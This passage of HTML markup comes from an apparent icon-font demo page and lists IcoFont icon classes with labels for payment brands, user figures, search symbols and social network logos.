					<i class="icofont-2checkout"></i>
				</div> 
				<span> 2checkout </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-amazon-alt"></i>
				</div> 
				<span> amazon-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-amazon"></i>
				</div> 
				<span> amazon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-american-express-alt"></i>
				</div> 
				<span> american-express-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-american-express"></i>
				</div> 
				<span> american-express </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-apple-pay-alt"></i>
				</div> 
				<span> apple-pay-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-apple-pay"></i>
				</div> 
				<span> apple-pay </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bank-transfer-alt"></i>
				</div> 
				<span> bank-transfer-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bank-transfer"></i>
				</div> 
				<span> bank-transfer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-braintree-alt"></i>
				</div> 
				<span> braintree-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-braintree"></i>
				</div> 
				<span> braintree </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cash-on-delivery-alt"></i>
				</div> 
				<span> cash-on-delivery-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cash-on-delivery"></i>
				</div> 
				<span> cash-on-delivery </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-diners-club-alt-1"></i>
				</div> 
				<span> diners-club-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-diners-club-alt-2"></i>
				</div> 
				<span> diners-club-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-diners-club-alt-3"></i>
				</div> 
				<span> diners-club-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-diners-club"></i>
				</div> 
				<span> diners-club </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-discover-alt"></i>
				</div> 
				<span> discover-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-discover"></i>
				</div> 
				<span> discover </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eway-alt"></i>
				</div> 
				<span> eway-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-eway"></i>
				</div> 
				<span> eway </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-wallet-alt-1"></i>
				</div> 
				<span> google-wallet-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-wallet-alt-2"></i>
				</div> 
				<span> google-wallet-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-wallet-alt-3"></i>
				</div> 
				<span> google-wallet-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-wallet"></i>
				</div> 
				<span> google-wallet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jcb-alt"></i>
				</div> 
				<span> jcb-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-jcb"></i>
				</div> 
				<span> jcb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-maestro-alt"></i>
				</div> 
				<span> maestro-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-maestro"></i>
				</div> 
				<span> maestro </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mastercard-alt"></i>
				</div> 
				<span> mastercard-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mastercard"></i>
				</div> 
				<span> mastercard </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-payoneer-alt"></i>
				</div> 
				<span> payoneer-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-payoneer"></i>
				</div> 
				<span> payoneer </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paypal-alt"></i>
				</div> 
				<span> paypal-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paypal"></i>
				</div> 
				<span> paypal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sage-alt"></i>
				</div> 
				<span> sage-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sage"></i>
				</div> 
				<span> sage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-skrill-alt"></i>
				</div> 
				<span> skrill-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-skrill"></i>
				</div> 
				<span> skrill </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stripe-alt"></i>
				</div> 
				<span> stripe-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stripe"></i>
				</div> 
				<span> stripe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-visa-alt"></i>
				</div> 
				<span> visa-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-visa-electron"></i>
				</div> 
				<span> visa-electron </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-visa"></i>
				</div> 
				<span> visa </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-western-union-alt"></i>
				</div> 
				<span> western-union-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-western-union"></i>
				</div> 
				<span> western-union </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-boy"></i>
				</div> 
				<span> boy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-business-man-alt-1"></i>
				</div> 
				<span> business-man-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-business-man-alt-2"></i>
				</div> 
				<span> business-man-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-business-man-alt-3"></i>
				</div> 
				<span> business-man-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-business-man"></i>
				</div> 
				<span> business-man </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-female"></i>
				</div> 
				<span> female </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-funky-man"></i>
				</div> 
				<span> funky-man </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-girl-alt"></i>
				</div> 
				<span> girl-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-girl"></i>
				</div> 
				<span> girl </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-group"></i>
				</div> 
				<span> group </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hotel-boy-alt"></i>
				</div> 
				<span> hotel-boy-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hotel-boy"></i>
				</div> 
				<span> hotel-boy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kid"></i>
				</div> 
				<span> kid </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-man-in-glasses"></i>
				</div> 
				<span> man-in-glasses </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-people"></i>
				</div> 
				<span> people </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-support"></i>
				</div> 
				<span> support </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-alt-1"></i>
				</div> 
				<span> user-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-alt-2"></i>
				</div> 
				<span> user-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-alt-3"></i>
				</div> 
				<span> user-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-alt-4"></i>
				</div> 
				<span> user-alt-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-alt-5"></i>
				</div> 
				<span> user-alt-5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-alt-6"></i>
				</div> 
				<span> user-alt-6 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-alt-7"></i>
				</div> 
				<span> user-alt-7 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-female"></i>
				</div> 
				<span> user-female </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-male"></i>
				</div> 
				<span> user-male </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user-suited"></i>
				</div> 
				<span> user-suited </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-user"></i>
				</div> 
				<span> user </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users-alt-1"></i>
				</div> 
				<span> users-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users-alt-2"></i>
				</div> 
				<span> users-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users-alt-3"></i>
				</div> 
				<span> users-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users-alt-4"></i>
				</div> 
				<span> users-alt-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users-alt-5"></i>
				</div> 
				<span> users-alt-5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users-alt-6"></i>
				</div> 
				<span> users-alt-6 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users-social"></i>
				</div> 
				<span> users-social </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-users"></i>
				</div> 
				<span> users </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-waiter-alt"></i>
				</div> 
				<span> waiter-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-waiter"></i>
				</div> 
				<span> waiter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-woman-in-glasses"></i>
				</div> 
				<span> woman-in-glasses </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-1"></i>
				</div> 
				<span> search-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-2"></i>
				</div> 
				<span> search-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-document"></i>
				</div> 
				<span> search-document </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-folder"></i>
				</div> 
				<span> search-folder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-job"></i>
				</div> 
				<span> search-job </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-map"></i>
				</div> 
				<span> search-map </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-property"></i>
				</div> 
				<span> search-property </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-restaurant"></i>
				</div> 
				<span> search-restaurant </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-stock"></i>
				</div> 
				<span> search-stock </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search-user"></i>
				</div> 
				<span> search-user </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-search"></i>
				</div> 
				<span> search </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-500px"></i>
				</div> 
				<span> 500px </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-aim"></i>
				</div> 
				<span> aim </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-badoo"></i>
				</div> 
				<span> badoo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-baidu-tieba"></i>
				</div> 
				<span> baidu-tieba </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bbm-messenger"></i>
				</div> 
				<span> bbm-messenger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bebo"></i>
				</div> 
				<span> bebo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-behance"></i>
				</div> 
				<span> behance </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-blogger"></i>
				</div> 
				<span> blogger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bootstrap"></i>
				</div> 
				<span> bootstrap </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brightkite"></i>
				</div> 
				<span> brightkite </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cloudapp"></i>
				</div> 
				<span> cloudapp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-concrete5"></i>
				</div> 
				<span> concrete5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-delicious"></i>
				</div> 
				<span> delicious </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-designbump"></i>
				</div> 
				<span> designbump </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-designfloat"></i>
				</div> 
				<span> designfloat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-deviantart"></i>
				</div> 
				<span> deviantart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-digg"></i>
				</div> 
				<span> digg </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dotcms"></i>
				</div> 
				<span> dotcms </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dribbble"></i>
				</div> 
				<span> dribbble </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dribble"></i>
				</div> 
				<span> dribble </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dropbox"></i>
				</div> 
				<span> dropbox </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ebuddy"></i>
				</div> 
				<span> ebuddy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ello"></i>
				</div> 
				<span> ello </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ember"></i>
				</div> 
				<span> ember </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-envato"></i>
				</div> 
				<span> envato </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-evernote"></i>
				</div> 
				<span> evernote </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-facebook-messenger"></i>
				</div> 
				<span> facebook-messenger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-facebook"></i>
				</div> 
				<span> facebook </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-feedburner"></i>
				</div> 
				<span> feedburner </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-flikr"></i>
				</div> 
				<span> flikr </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-folkd"></i>
				</div> 
				<span> folkd </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-foursquare"></i>
				</div> 
				<span> foursquare </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-friendfeed"></i>
				</div> 
				<span> friendfeed </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ghost"></i>
				</div> 
				<span> ghost </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-github"></i>
				</div> 
				<span> github </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gnome"></i>
				</div> 
				<span> gnome </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-buzz"></i>
				</div> 
				<span> google-buzz </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-hangouts"></i>
				</div> 
				<span> google-hangouts </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-map"></i>
				</div> 
				<span> google-map </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-plus"></i>
				</div> 
				<span> google-plus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-google-talk"></i>
				</div> 
				<span> google-talk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hype-machine"></i>
				</div> 
				<span> hype-machine </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-instagram"></i>
				</div> 
				<span> instagram </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kakaotalk"></i>
				</div> 
				<span> kakaotalk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kickstarter"></i>
				</div> 
				<span> kickstarter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kik"></i>
				</div> 
				<span> kik </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-kiwibox"></i>
				</div> 
				<span> kiwibox </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-line-messenger"></i>
				</div> 
				<span> line-messenger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-line"></i>
				</div> 
				<span> line </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-linkedin"></i>
				</div> 
				<span> linkedin </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-linux-mint"></i>
				</div> 
				<span> linux-mint </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-live-messenger"></i>
				</div> 
				<span> live-messenger </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-livejournal"></i>
				</div> 
				<span> livejournal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-magento"></i>
				</div> 
				<span> magento </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-meetme"></i>
				</div> 
				<span> meetme </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-meetup"></i>
				</div> 
				<span> meetup </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-mixx"></i>
				</div> 
				<span> mixx </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-newsvine"></i>
				</div> 
				<span> newsvine </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-nimbuss"></i>
				</div> 
				<span> nimbuss </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-odnoklassniki"></i>
				</div> 
				<span> odnoklassniki </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-opencart"></i>
				</div> 
				<span> opencart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-oscommerce"></i>
				</div> 
				<span> oscommerce </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pandora"></i>
				</div> 
				<span> pandora </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-photobucket"></i>
				</div> 
				<span> photobucket </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-picasa"></i>
				</div> 
				<span> picasa </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pinterest"></i>
				</div> 
				<span> pinterest </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-prestashop"></i>
				</div> 
				<span> prestashop </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-qik"></i>
				</div> 
				<span> qik </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-qq"></i>
				</div> 
				<span> qq </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-readernaut"></i>
				</div> 
				<span> readernaut </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-reddit"></i>
				</div> 
				<span> reddit </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-renren"></i>
				</div> 
				<span> renren </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rss"></i>
				</div> 
				<span> rss </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-shopify"></i>
				</div> 
				<span> shopify </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-silverstripe"></i>
				</div> 
				<span> silverstripe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-skype"></i>
				</div> 
				<span> skype </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-slack"></i>
				</div> 
				<span> slack </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-slashdot"></i>
				</div> 
				<span> slashdot </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-slidshare"></i>
				</div> 
				<span> slidshare </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-smugmug"></i>
				</div> 
				<span> smugmug </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-snapchat"></i>
				</div> 
				<span> snapchat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-soundcloud"></i>
				</div> 
				<span> soundcloud </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-spotify"></i>
				</div> 
				<span> spotify </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stack-exchange"></i>
				</div> 
				<span> stack-exchange </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stack-overflow"></i>
				</div> 
				<span> stack-overflow </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-steam"></i>
				</div> 
				<span> steam </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stumbleupon"></i>
				</div> 
				<span> stumbleupon </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tagged"></i>
				</div> 
				<span> tagged </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-technorati"></i>
				</div> 
				<span> technorati </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-telegram"></i>
				</div> 
				<span> telegram </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tinder"></i>
				</div> 
				<span> tinder </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-trello"></i>
				</div> 
				<span> trello </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-tumblr"></i>
				</div> 
				<span> tumblr </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-twitch"></i>
				</div> 
				<span> twitch </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-twitter"></i>
				</div> 
				<span> twitter </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-typo3"></i>
				</div> 
				<span> typo3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-ubercart"></i>
				</div> 
				<span> ubercart </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-viber"></i>
				</div> 
				<span> viber </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-viddler"></i>
				</div> 
				<span> viddler </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vimeo"></i>
				</div> 
				<span> vimeo </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-vine"></i>
				</div> 
				<span> vine </span>
			</div>
		</li>
		
		<li>
